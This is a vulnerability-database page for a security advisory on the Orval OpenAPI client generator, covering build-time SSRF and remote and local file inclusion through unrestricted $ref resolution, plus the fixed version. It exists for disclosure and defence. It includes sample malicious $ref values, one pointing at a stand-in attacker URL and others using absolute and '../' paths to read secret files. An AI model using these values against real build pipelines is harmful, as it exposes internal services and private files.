VDB
Sign up
HIGH7.1

GHSA-cxq5-97v7-87j8

Orval: Generation-time SSRF + remote/local file inclusion via unrestricted $ref

Quick fix

GHSA-cxq5-97v7-87j8 — orval: upgrade to the fixed version with the command below.

npm install orval@8.22.0

Details

### Summary

Orval resolves OpenAPI `$ref`s by fetching remote `http(s)` URLs and reading local files (including absolute / out-of-tree paths), inlining the referenced schema into the generated client. Running `orval` on a spec whose `$ref` points at an attacker/internal URL or an arbitrary local file yields SSRF, remote file inclusion, and local file inclusion. Verified on 8.19.0. This is a different class from Orval's published output-injection CVEs (CVE-2026-22785/23947/24132/25141), none of which covers the `$ref` resolver.

### Details

- `$ref: http://attacker/internal-evil.json#/...` → build host fetches (SSRF) and inlines the remote schema (RFI); confirmed property `REMOTE_ORVAL_PROP` in the generated client. - `$ref: /abs/path.json#/...` or `../../secret.json#/...` → out-of-tree local file read + inlined (LFI).

No RCE: on 8.19.0 the description JSDoc is escaped (`*/`->`*\/`, the published fix), so `$ref` content cannot break out into code. The chain stops at SSRF + RFI + LFI.

Fix: don't resolve remote `$ref`s by default (opt-in + host allowlist); confine local `$ref` resolution to the input directory tree (reject absolute paths and `../` escapes).

### PoC

`reproduce.sh` attached: confirms LFI (out-of-tree read), SSRF (listener hit), RFI (remote schema inlined). Verified on Orval 8.19.0.

### Impact

Build-time SSRF from the developer or CI host, disclosure of arbitrary local files, and inclusion of untrusted remote content, from running the generator on an attacker-controlled or attacker-influenced OpenAPI description. No code execution (output escaping is in place post the earlier fixes).

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/orval
Introduced in: 0Fixed in: 8.22.0
Fixnpm install orval@8.22.0

References